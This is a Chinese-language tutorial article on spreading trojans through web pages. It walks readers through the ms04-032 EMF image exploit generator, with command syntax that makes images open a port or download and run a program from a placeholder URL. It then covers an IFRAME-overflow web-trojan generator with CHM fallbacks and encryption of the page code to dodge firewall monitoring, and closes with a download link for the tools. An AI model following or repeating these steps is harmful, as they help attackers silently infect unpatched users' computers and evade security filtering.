各式各樣的木馬程序之所以會在網絡上橫行,網頁傳播是功不可沒的。相對於其他傳播途徑,網頁傳播的危害面非常廣泛,而IE層出不窮的漏洞也使很多朋友在不知不覺中中招。這一期的木馬屠城,筆者就針對如何傳播木馬這一問題,對最近較經典的網頁木馬傳播方式進行剖析,讓大家知道這些“夾心”網頁中的木馬是怎樣將用戶殺於無形之中的。
圖形渲染漏洞
大家可曾想過浏覽一個圖片文件就會中木馬,並且還不是以前的那種以“.JPEG”結尾的木馬,因為Windows又給黑客們爆出了一個更新的可利用漏洞。(本文為WWW.SQ120.COM電腦知識網推薦文章)
在Windows XP SP1、Windows Server 2003、Windows 2000 SP4中,系統對Windows圖像文件(WMF)和增強型圖像文件(EMF)圖像格式進行的渲染存在一個遠程代碼執行漏洞,它使得惡意攻擊者可以在受影響的系統上執行遠程代碼。漏洞的利用十分簡單,我們只需要使用ms04-032溢出程序即可生成帶溢出效果的EMF圖片。
進入命令提示符窗口,輸入格式為“ms04-32.exe <生成的文件名> <生成方式> <端口號(溢出方式①)/下載程序地址(溢出方式②)>”的命令。tw.WInGwiT.COM
提示:溢出方式可分為“1-端口方式溢出”和“2-下載溢出”。
例如輸入“ms04-32 1.emf 1 21”,這樣就生成了一個可以打開21端口的EMF圖片(圖1)。圖1
提示:輸入“ms04-32 test.emf 2 http://www.xxx.xxx/xxx.exe”,就生成了一個可以自動在http://www.xxx.xxx/xxx.exe下載並自動運行xxx.exe這個程序的EMF圖片。
現在只要把此圖片上傳到自己的空間,然後將圖片地址發給對方,沒有及時更新補丁的用戶看了圖片後就會在不知情的情況下中招。
IFRAME溢出型木馬
在這裡筆者要給大家介紹的是如何讓對方通過訪問一個看似平常的網頁,而不知不覺地中木馬。這是網頁木馬傳播最主要的途徑,因為看似平常的網頁浏覽,也會帶來很多嚴重的後果。
當IFRAME溢出公布後,網上就有高手針對已經公布的惡意代碼進行了修改並寫成了專門的木馬生成器,使得它能順利地工作在Windows 98、Windows Me、Windows 2000、Windows XP SP1(IE6)等系統下。由於它的危害很大,安裝了IE6的電腦會受到iFrame漏洞的影響(不包括已升級到Windows XP SP2的系統)。
運行wymmpro.exe程序後,出現如圖2所示的界面。首先在第一行填入已准備好的木馬程序路徑(網絡路徑),接下來在第二欄中選擇IE的彈出方式和自定義生成的木馬網頁名。建議大家選擇第一項,這樣就可防止某些系統攔截所彈出的窗口。
圖2
接下來在第三欄中選擇默認的大內存方式(用於網頁木馬)。為了防止對方使用的是IE5.0/5.5而不會中招,我們可以在此生成CHM木馬來達到傳播的目的,我們只需要把准備好的木馬程序放到木馬生成器的CHM目錄下,並根據提示填寫好木馬程序名和欲生成的CHM文件名以及用來存放該CHM的網絡地址即可。
最後就是包裝工作,我們可以選擇對生成的網頁木馬代碼進行壓縮或加密,防止被帶網頁代碼監控功能的防火牆攔截。現在,一個活生生的網頁木馬就制作好了。
軟件下載地址:http://www.sixvee.com/520yy/tools/cytkk-3.rar
From:http://tw.wingwit.com/Article/Network/201309/1039.html